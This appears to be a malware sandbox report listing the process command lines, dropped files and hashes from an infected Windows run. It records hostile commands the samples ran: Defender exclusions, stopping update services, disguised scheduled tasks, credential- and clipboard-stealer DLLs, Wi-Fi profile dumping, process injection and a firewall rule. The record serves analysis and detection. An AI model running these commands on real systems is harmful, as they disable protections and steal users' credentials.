C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7016 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x47c 0x4a8
C:\Users\Admin\AppData\Local\Temp\3836.exe
C:\Users\Admin\AppData\Local\Temp\3836.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\41DC.exe
C:\Users\Admin\AppData\Local\Temp\41DC.exe
C:\Users\Admin\AppData\Local\Temp\4A79.exe
C:\Users\Admin\AppData\Local\Temp\4A79.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5672 -ip 5672
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 840
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"
C:\Users\Admin\AppData\Local\Temp\3DB5.exe
C:\Users\Admin\AppData\Local\Temp\3DB5.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp" /SL4 $B01C0 "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" 4760119 79360
C:\Program Files (x86)\BBuster\BBuster.exe
"C:\Program Files (x86)\BBuster\BBuster.exe" -i
C:\Program Files (x86)\BBuster\BBuster.exe
"C:\Program Files (x86)\BBuster\BBuster.exe" -s
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6868 /prefetch:8
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 3
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:N"
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\771604342093_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:R" /E
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\D3AF.exe
C:\Users\Admin\AppData\Local\Temp\D3AF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:8
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe
| MD5 | f88f9f0aa65c9a7539ba51fb254322b3 |
| SHA1 | 357d466843db0783d61130a3f7a5949241acfe30 |
| SHA256 | af9e55e83d026cf03000fa394257145ef2bd4860aa5a7dc9ff95509fb294e246 |
| SHA512 | 303515e7c6dd84b37e5bccede31399adc7489d29a1931948ef55284d5536756a76ca3aca02932d0b72d606ad7c8454b5347584af0cc516d2320529b7c88c7ec1 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe
| MD5 | f88f9f0aa65c9a7539ba51fb254322b3 |
| SHA1 | 357d466843db0783d61130a3f7a5949241acfe30 |
| SHA256 | af9e55e83d026cf03000fa394257145ef2bd4860aa5a7dc9ff95509fb294e246 |
| SHA512 | 303515e7c6dd84b37e5bccede31399adc7489d29a1931948ef55284d5536756a76ca3aca02932d0b72d606ad7c8454b5347584af0cc516d2320529b7c88c7ec1 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe
| MD5 | 45a3bb26ea6be74edc125030beeef437 |
| SHA1 | 366fe6443678f62e564919e1b0043f8a3d4072d2 |
| SHA256 | 3d426ba7313007978b404b0a54ac66c53d62a851b9992e5b53e8b21f5e0dcc12 |
| SHA512 | 470b71f2a97ae47b6e5fbc717b4df2bac37882890be99e3ced126104747f9d601fe62202cd00989e0e13e689e107030a9a60edc23e176ec9c97e67abc756d320 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe
| MD5 | 45a3bb26ea6be74edc125030beeef437 |
| SHA1 | 366fe6443678f62e564919e1b0043f8a3d4072d2 |
| SHA256 | 3d426ba7313007978b404b0a54ac66c53d62a851b9992e5b53e8b21f5e0dcc12 |
| SHA512 | 470b71f2a97ae47b6e5fbc717b4df2bac37882890be99e3ced126104747f9d601fe62202cd00989e0e13e689e107030a9a60edc23e176ec9c97e67abc756d320 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe
| MD5 | 7e93bacbbc33e6652e147e7fe07572a0 |
| SHA1 | 421a7167da01c8da4dc4d5234ca3dd84e319e762 |
| SHA256 | 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 |
